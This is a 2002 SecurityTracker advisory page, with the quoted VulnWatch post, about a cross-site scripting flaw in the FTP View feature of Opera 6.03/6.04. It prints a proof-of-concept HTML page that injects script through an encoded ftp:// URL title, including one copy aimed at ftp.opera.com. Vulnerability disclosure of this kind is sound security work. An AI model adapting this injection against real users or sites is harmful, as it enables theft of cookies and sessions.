SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Web Browser)  >   Opera Vendors:   Opera Software
Opera Web Browser Input Validation Flaw in FTP View Feature May Let Remote Users Conduct Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1004962
SecurityTracker URL:  http://securitytracker.com/id/1004962
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Aug 6 2002
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network

Version(s): 6.03, 6.04
Description:   An input validation vulnerability was reported in the Opera web browser. A remote user may be able to conduct cross-site scripting attacks in certain situations.

It is reported that Opera does not filter scripting code presented in the title bar in the FTP View feature. A remote user can create a specially crafted URL that, when loaded by a target user, may cause arbitrary scripting code to be executed by the target user's browser.

A demonstration exploit is provided:

<html>
<head>
<META http-equiv="Refresh" content="5 ; url=ftp://%3c%2ftitle%3e%3cscript%3ealert(%22exploit%22)%3b%3c%2fscript%3e@[FTPserver]/">
</head>
<body>
<script>window.open("ftp://[FTPserver]/");</script>
</body>
</html>

The code will appear to originate from the FTP server site and will run in the security context of that site. If the FTP server is also running an HTTP server, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the related web site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

The vendor has reportedly been notified.

Impact:   A remote user may be able to access the target user's cookies (including authentication cookies), if any, associated with a target web site (if it is also running an FTP server), access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.opera.com/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  BeOS, Linux (Any), Apple (Legacy "classic" Mac), UNIX (Solaris - SunOS), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [VulnWatch] Opera FTP View Cross-Site Scripting Vulnerability


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


Title:
~~~~~~~~~~~~~~~~~
Opera FTP View Cross-Site Scripting Vulnerability

 
Date:
~~~~~~~~~~~~~~~~~
4 August 2002

 
Author:
~~~~~~~~~~~~~~~~~
Eiji James Yoshida [ptrs-ejy@bp.iij4u.or.jp]

 
Risk:
~~~~~~~~~~~~~~~~~
Medium

 
Vulnerable:
~~~~~~~~~~~~~~~~~
Windows2000 SP2 Opera 6.03
Windows2000 SP2 Opera 6.04

 
Overview:
~~~~~~~~~~~~~~~~~
Opera allows running Malicious Scripts due to a bug in 'FTP view' feature.
If you click on a malicious link, the script embedded in URL will run.

 
Details:
~~~~~~~~~~~~~~~~~
This problem is in 'FTP view' feature.
The '<title>URL</title>' is not escaped.

 
Exploit code:
~~~~~~~~~~~~~~~~~
<html>
<head>
<META http-equiv="Refresh" content="5 ; url=ftp://%3c%2ftitle%3e%3cscript%3ealert(%22exploit%22)%3b%3c%2fscript%3e@[FTPserver]/">
</head>
<body>
<script>window.open("ftp://[FTPserver]/");</script>
</body>
</html>

Example:
<html>
<head>
<META http-equiv="Refresh" content="5 ; url=ftp://%3c%2ftitle%3e%3cscript%3ealert(%22exploit%22)%3b%3c%2fscript%3e@ftp.opera.com/">
</head>
<body>
<script>window.open("ftp://ftp.opera.com/");</script>
</body>
</html>

 
Demonstration:
~~~~~~~~~~~~~~~~~
http://www.geocities.co.jp/SiliconValley/1667/advisory04e.html

 
Workaround:
~~~~~~~~~~~~~~~~~
Disable JavaScript.

 
Vendor status:
~~~~~~~~~~~~~~~~~
Opera Software ASA was notified on 30 June 2002.
 

- -------------------------------------------------------------
Eiji "James" Yoshida
penetration technique research site
E-mail: zaddik@geocities.co.jp
URL: http://www.geocities.co.jp/SiliconValley/1667/index.htm
- -------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.8ckt
Comment: Eiji James Yoshida

iQA/AwUBPU92oTnqpMRtMot1EQKN1gCcCsMtg6cAEBGMdfupW/WvmYIl+R0AoK1E
JiccWmvatZQwH9YV3FX8q1pv
=eHkj
-----END PGP SIGNATURE-----





 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC